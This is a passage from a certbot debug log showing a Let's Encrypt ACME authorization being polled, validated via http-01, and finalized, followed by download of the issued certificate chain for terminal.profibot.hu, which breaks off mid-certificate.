'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:22:03,352:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:22:03,353:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibE94UHE0ZzRoTS04MnhxM3Zqek90UXFRd052LTFlb2JzZHh1VnBhZFNLZ2MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "jZqatY0tCqGh8NVG1jkVxnaKPuQylIrg7ztuBfCz0wClao1Kfd6373HC6g3BxXSrGf5rJvIPoJgnd0p3w8FjeZUDpq0x0sgt0kTeTHBO1m3bRC6_ZJujedM0Jnpyuuh94Y5UwKFUUGmHBsZSAn6Schoi7lXKbPI4GJaNZvqWMNCOqV4iHSWs25SoTq9mfRR2RM0EWDwOk49vtV4HqeuhinEjGz7xcNDr9GtXjoK2cHITnxoTI15KQPpKo9IgFArwj6if_6_9KgvqsVKBq9vbS9gbFMAcYvp3IQAeHXx8ZSdhk0wKSkome2ihQ_lhgypvnODJBqkq5r59bSuLFBvzbg", + "payload": "" +} +2026-01-27 23:22:03,520:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:22:03,521:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:22:03 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblZ8NmBiyOgFd8_YSzerxyteciRujSG7KRcPzdxItZ_4A +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:22:03,521:DEBUG:acme.client:Storing nonce: _aMw-OblZ8NmBiyOgFd8_YSzerxyteciRujSG7KRcPzdxItZ_4A +2026-01-27 23:22:03,522:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:22:06,522:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:22:06,525:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibFo4Tm1CaXlPZ0ZkOF9ZU3plcnh5dGVjaVJ1alNHN0tSY1B6ZHhJdFpfNEEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "fh8YrlCfWDmoyZ9fbN7GYuNq_WvW60fNyEaYf_YVSfqHHtL_7pLU8HoLgiOeWfr6ytxoi_lb0sMRXuwK2oaafieKs0q_HaN1vXYM1P4OFYwghh5fjMBSo_QMKBCrRzjCAxeZIn3ALNfAavwoJjV47FncvD3Qe7vaUmLURM54XgZ40NrZJ5tN_nFSjHtWHOhpIF8_J1N9EMXbjmbzXbWD2g0wLA-mUfOXo2z8tsPtjgZ5nG_FPV07tCv7QN6RmPaV0RdWRazGXipmGcc2eey8OFjVVQnO925hReZJNmSIuhZ4ZAbPHjCPjIDn6dYboPVkBbREn-8paIgfeQlG0bV83w", + "payload": "" +} +2026-01-27 23:22:06,687:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:22:06,688:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:22:06 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-ObloAzYM_eEW6CMYJmlDzNEH4enQDkIAZbb5SRmw4dIBIY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:22:06,689:DEBUG:acme.client:Storing nonce: _aMw-ObloAzYM_eEW6CMYJmlDzNEH4enQDkIAZbb5SRmw4dIBIY +2026-01-27 23:22:06,689:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:22:09,690:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:22:09,692:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibG9BellNX2VFVzZDTVlKbWxEek5FSDRlblFEa0lBWmJiNVNSbXc0ZElCSVkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "Ipqqpxns5pwGBAj_jJlGbZl7sKb-m2SQmh-J__7wicS6VGoCyAsW94GCPkG8TerRg_KiLK_4Q877rioi4fo8PbArzcwNK8i5VngzUPE05tDXCFv8b7H7HAkR5-tAopMv7JWIxh9WxEHvi_yrAjmaF3cUjA2v_DxtzWmKexxUgxnG7OuoThUvO1cNGM5IRIeUayHYsQalUqFqMEmsZJ8ovBmc0ytXXUohzWQRYDPC08Sy5vKaoM5TkxXtGrG73kGBq48OeC_x5Nq2QFQBIoKBDrsB9xAV97S1Er0jos850KXq5L5gHsK1t1q_fPcQ9lGo7eIHOECp0j0eRGs1TSafWQ", + "payload": "" +} +2026-01-27 23:22:09,848:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 828 +2026-01-27 23:22:09,849:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:22:09 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblG1Ng92-lnXXDyjc_6m-Q_VNuO7wb1HvkJEyTWZ1geGM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:21:30Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/xflWag", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw", + "status": "pending", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0" + } + ] +} +2026-01-27 23:22:09,849:DEBUG:acme.client:Storing nonce: _aMw-OblG1Ng92-lnXXDyjc_6m-Q_VNuO7wb1HvkJEyTWZ1geGM +2026-01-27 23:22:09,850:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/dbBOjw', 'status': 'pending', 'token': 'ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0'} +2026-01-27 23:22:12,851:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:22:12,854:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibEcxTmc5Mi1sblhYRHlqY182bS1RX1ZOdU83d2IxSHZrSkV5VFdaMWdlR00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg5MjA5NTE2In0", + "signature": "RbMgfJr64IHfq2-8R5Oufj2RpREEZiFhplhUMDdz7izf5ZkcFAmdcOx9nkcM6ICJJvvgdEwu9eaoyQrdo9gM67BNkYUufYCmegJYk4LLkneluC5aveUoUkcazD7sQlcjE6rLd7Zpm3IgDJnR41CewRDc7xmfeJ_tBD1ylgo4jivrenLZuhcFTOf4BQiDQtrQfJ0X4uw-uVReo-XuimEkfeQxj0h9K-aXe9nKjmeGdbvlo3R4pMKlnlbI0QJk08RiiWQXFENioXjU4qIHge8Gk_evXBGTaTXR5JjybScXdyZuJ5c_SCY0URoBncUwLeJxIUit-AbXSpQ1QyZz1_STyA", + "payload": "" +} +2026-01-27 23:22:13,011:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649789209516 HTTP/1.1" 200 783 +2026-01-27 23:22:13,012:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:22:12 GMT +Content-Type: application/json +Content-Length: 783 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: _aMw-OblXcyhMnaISAZLiAt6LH0rk-pc-qLFMnhMAQUzJJn8hXo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "valid", + "expires": "2026-02-26T23:22:11Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649789209516/zVloSA", + "status": "valid", + "validated": "2026-01-27T23:21:30Z", + "token": "ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0", + "validationRecord": [ + { + "url": "http://terminal.profibot.hu/.well-known/acme-challenge/ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0", + "hostname": "terminal.profibot.hu", + "port": "80", + "addressesResolved": [ + "91.82.215.191" + ], + "addressUsed": "91.82.215.191" + } + ] + } + ] +} +2026-01-27 23:22:13,012:DEBUG:acme.client:Storing nonce: _aMw-OblXcyhMnaISAZLiAt6LH0rk-pc-qLFMnhMAQUzJJn8hXo +2026-01-27 23:22:13,013:DEBUG:certbot._internal.error_handler:Calling registered functions +2026-01-27 23:22:13,013:INFO:certbot._internal.auth_handler:Cleaning up challenges +2026-01-27 23:22:13,013:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/ADcwHuUGpr9l6mmvyXLyahhQ8-xBQ25cVpsfeoQwDa0 +2026-01-27 23:22:13,014:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2026-01-27 23:22:13,015:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKjCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEEoVjEbEuBSGcEzFv\nJ5z/39X14vJk7ASsC7+KB3ECIqjRZjuZmrzJDNPEFKLqtcv4sWAvDJpXb6NcQLQU\nmgGAi0c5O1D+jHPyFfifc1t0O8wRGE3t2vQw6BTZKf/Cw2V+oDIwMAYJKoZIhvcN\nAQkOMSMwITAfBgNVHREEGDAWghR0ZXJtaW5hbC5wcm9maWJvdC5odTAKBggqhkjO\nPQQDAgNoADBlAjEA9JEIgrRD22WF578iTlr6SHhOU7eUx4DlbWVlmC8u+JbDn2uI\nNbPnXhIe+pmtrLcfAjBVMNj9s4vT0sYYzfHSfnZ432DNhvNHaeCFD2DwTbZGvA5k\nY2D99u+A2UQX5X196JQ=\n-----END CERTIFICATE REQUEST-----\n', form='pem') +2026-01-27 23:22:13,015:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-01-27 23:23:43.015861 +2026-01-27 23:22:13,016:DEBUG:acme.client:JWS payload: +b'{\n "csr": "MIIBKjCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEEoVjEbEuBSGcEzFvJ5z_39X14vJk7ASsC7-KB3ECIqjRZjuZmrzJDNPEFKLqtcv4sWAvDJpXb6NcQLQUmgGAi0c5O1D-jHPyFfifc1t0O8wRGE3t2vQw6BTZKf_Cw2V-oDIwMAYJKoZIhvcNAQkOMSMwITAfBgNVHREEGDAWghR0ZXJtaW5hbC5wcm9maWJvdC5odTAKBggqhkjOPQQDAgNoADBlAjEA9JEIgrRD22WF578iTlr6SHhOU7eUx4DlbWVlmC8u-JbDn2uINbPnXhIe-pmtrLcfAjBVMNj9s4vT0sYYzfHSfnZ432DNhvNHaeCFD2DwTbZGvA5kY2D99u-A2UQX5X196JQ"\n}' +2026-01-27 23:22:13,020:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/474148880876: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibFhjeWhNbmFJU0FaTGlBdDZMSDByay1wYy1xTEZNbmhNQVFVekpKbjhoWG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzI5MDY0MzgxNzYvNDc0MTQ4ODgwODc2In0", + "signature": "HrxR-fbzUmQ7jtMzLXovGUKn13iWPd-nSBGdMrVv3DcQEdbze7GAu68eXgYQRmzGBqQzXQltGZQjNGpPqYbCaNSIsnjVWZZ12o9nMbxH96csw-CJjqgGLb45BmzbqiJmKAUzB0nPPGaEprMti_lWcjlMirGJwxWc8UlrbCRcj8uYELXt2fklryll7f5M62h7252k1M_waCu8QmsNwoc8brLcHctQtTtlm43lkrR_KU8xhQkUYYzUCZ_hCFoHetPYAh9eUCX996qs9zQb27HnWoNrFNQYX3RZEOkW3NRDZwc32RFOqw6__PZxsoR5Rsv1xkGKEFvlj3-V7WwE9eZbyw", + "payload": "ewogICJjc3IiOiAiTUlJQktqQ0JzUUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFRW9WakViRXVCU0djRXpGdko1el8zOVgxNHZKazdBU3NDNy1LQjNFQ0lxalJaanVabXJ6SkROUEVGS0xxdGN2NHNXQXZESnBYYjZOY1FMUVVtZ0dBaTBjNU8xRC1qSFB5RmZpZmMxdDBPOHdSR0UzdDJ2UXc2QlRaS2ZfQ3cyVi1vREl3TUFZSktvWklodmNOQVFrT01TTXdJVEFmQmdOVkhSRUVHREFXZ2hSMFpYSnRhVzVoYkM1d2NtOW1hV0p2ZEM1b2RUQUtCZ2dxaGtqT1BRUURBZ05vQURCbEFqRUE5SkVJZ3JSRDIyV0Y1NzhpVGxyNlNIaE9VN2VVeDREbGJXVmxtQzh1LUpiRG4ydUlOYlBuWGhJZS1wbXRyTGNmQWpCVk1OajlzNHZUMHNZWXpmSFNmblo0MzJETmh2TkhhZUNGRDJEd1RiWkd2QTVrWTJEOTl1LUEyVVFYNVgxOTZKUSIKfQ" +} +2026-01-27 23:22:14,104:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/2906438176/474148880876 HTTP/1.1" 200 456 +2026-01-27 23:22:14,105:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:22:14 GMT +Content-Type: application/json +Content-Length: 456 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/474148880876 +Replay-Nonce: _aMw-OblADPpq7DBK3TVA2mVx4wpN23zJY769C_yfK-UAIsTtNY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-02-03T23:21:30Z", + "identifiers": [ + { + "type": "dns", + "value": "terminal.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/474148880876", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/050c8ad7008ac7c7bfe67ccd2c4b7973741f" +} +2026-01-27 23:22:14,105:DEBUG:acme.client:Storing nonce: _aMw-OblADPpq7DBK3TVA2mVx4wpN23zJY769C_yfK-UAIsTtNY +2026-01-27 23:22:15,106:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:22:15,109:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/2906438176/474148880876: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibEFEUHBxN0RCSzNUVkEybVZ4NHdwTjIzekpZNzY5Q195ZkstVUFJc1R0TlkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzI5MDY0MzgxNzYvNDc0MTQ4ODgwODc2In0", + "signature": "NR-ejtUd_uhwGD6Ivm7D-WJ63dHCK-wXSNbXq0m3NLNv9Hph78or4ceFKZ3gHZ7aYE9pDzwmNYv8IYp7z7oREk73ql1jOczpscfP_9vCNNQ5pxzdPjdm279VaNk6YZV_AKisnngaq9p06hQbcAulJ1YCqDDrKrEuGFmKnb0gF1sMqepiO1nbIuLf6qwpRDrHl-1HZ8kfoEj6o9EcjZ52C3f8BLvtn2q2Sq_yR9jkC3zNX6ZzPaZJ-Uwa3bMQTPVTppcuO5VmIOc22YmDiK7uuEo3l_9iwdSKuXTuYmQYRCUszE_KFUl3lHVB-E5uc1OIGOGhC-zXvqilkn5x9Nw3ag", + "payload": "" +} +2026-01-27 23:22:15,265:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/2906438176/474148880876 HTTP/1.1" 200 456 +2026-01-27 23:22:15,266:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:22:15 GMT +Content-Type: application/json +Content-Length: 456 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/474148880876 +Replay-Nonce: _aMw-ObloPIQfEs814ngMxbIayUAQiAFH9mjZG4HWtP-CLViw0I +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-02-03T23:21:30Z", + "identifiers": [ + { + "type": "dns", + "value": "terminal.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649789209516" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/474148880876", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/050c8ad7008ac7c7bfe67ccd2c4b7973741f" +} +2026-01-27 23:22:15,266:DEBUG:acme.client:Storing nonce: _aMw-ObloPIQfEs814ngMxbIayUAQiAFH9mjZG4HWtP-CLViw0I +2026-01-27 23:22:15,267:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:22:15,270:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/050c8ad7008ac7c7bfe67ccd2c4b7973741f: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJfYU13LU9ibG9QSVFmRXM4MTRuZ014YklheVVBUWlBRkg5bWpaRzRIV3RQLUNMVml3MEkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDUwYzhhZDcwMDhhYzdjN2JmZTY3Y2NkMmM0Yjc5NzM3NDFmIn0", + "signature": "LNbLKoMMvro-izg4Z0LHmVOCmc-DYos6L2JiEfC1yJ5xDlK1FojTmSDlBZdMppYE5ir3fQ3FN1xStJWcY_G_pZi5KZxHLKomJ_68aAK1qhDTIZuAHWMvNiIxGXyja3WrcFAquA3ViLBf9Z6BrOfE01PoPm8dctQszHyK7aDm4611cQY-2u4KHnBJYUR9yPnuEUmmRnDh_AY3ac-XEN9HIZh6yt1TCR2_Kxw8D0GnCl7FY2GNAjJNMND7I9k9uOCM4ULKeqWurENmOVygogG89X042wdi3SCc713efZ37_72XNNeVqS6-qkcEuImWOfd7nMIrP3aAMjmIET2kFNzfXw", + "payload": "" +} +2026-01-27 23:22:15,444:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/050c8ad7008ac7c7bfe67ccd2c4b7973741f HTTP/1.1" 200 2917 +2026-01-27 23:22:15,445:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:22:15 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2917 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: 3aiLGgPYsnNHRZzdl4oxWf0cNhsIN7hExo6yAfe6T-gad36ffKY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDuDCCAz+gAwIBAgISBQyK1wCKx8e/5nzNLEt5c3QfMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNjAxMjcyMjIzNDNaFw0yNjA0MjcyMjIzNDJaMB8xHTAbBgNVBAMTFHRl +cm1pbmFsLnByb2ZpYm90Lmh1MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEEoVjEbEu +BSGcEzFvJ5z/39X14vJk7ASsC7+KB3ECIqjRZjuZmrzJDNPEFKLqtcv4sWAvDJpX +b6NcQLQUmgGAi0c5O1D+jHPyFfifc1t0O8wRGE3t2vQw6BTZKf/Cw2V+o4ICKTCC +AiUwDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD +AjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBQn1dxgdbo6x/C9QgKcbkkvnrFU1DAf +BgNVHSMEGDAWgBSuSJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQw +IgYIKwYBBQUHMAKGFmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHwYDVR0RBBgwFoIU +dGVybWluYWwucHJvZmlib3QuaHUwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0f +BCYwJDAioCCgHoYcaHR0cDovL2U3LmMubGVuY3Iub3JnLzMyLmNybDCCAQsGCisG +AQQB1nkCBAIEgfwEgfkA9wB1AEmcm2neHXzs/DbezYdkprhbrwqHgBnRVVL76esp +3fjDAAABnAHDxSQAAAQDAEYwRAIgZU4So71ktINNySQhQUysS6noNE1+1oSGYF/s +65mcvjQCIAn7PnXUCws1A3h5rwEwUuudTmD7d7RKfv2z96UJJQHYAH4Apcl4kl1X +RheChw3YiWYLXFVki30AQPLsB2hR0YhpGfcAAAGcAcPHxgAIAAAFADBG2foEAwBH +MEUCICox7SZ8xxKtGnntKaSMtjZ3LmBmEhNiBrl3oIj/STYiAiEA8RQiLwzW/uEu +bnYhe+ZRB6PvpCVlBaGdHN87+EK080EwCgYIKoZIzj0EAwMDZwAwZAIwCbJaioYq +nX3Dh2jvGwQbTZqWQo94heOGNUWwYpQtRyQOjWHr3CcplGAeb/11iWGXAjB5el/z +D6DA/e3kP5O9MB82qk/cIzoWOQ6kSE/WjTGeQ/fk5a/tCk5UXjsIFtcw9JI= +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw +TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh +cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw +WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg +RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST +CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef +QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw +gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD +ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4 +wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB +AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g +BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu +Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD +aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF +h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG +yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr 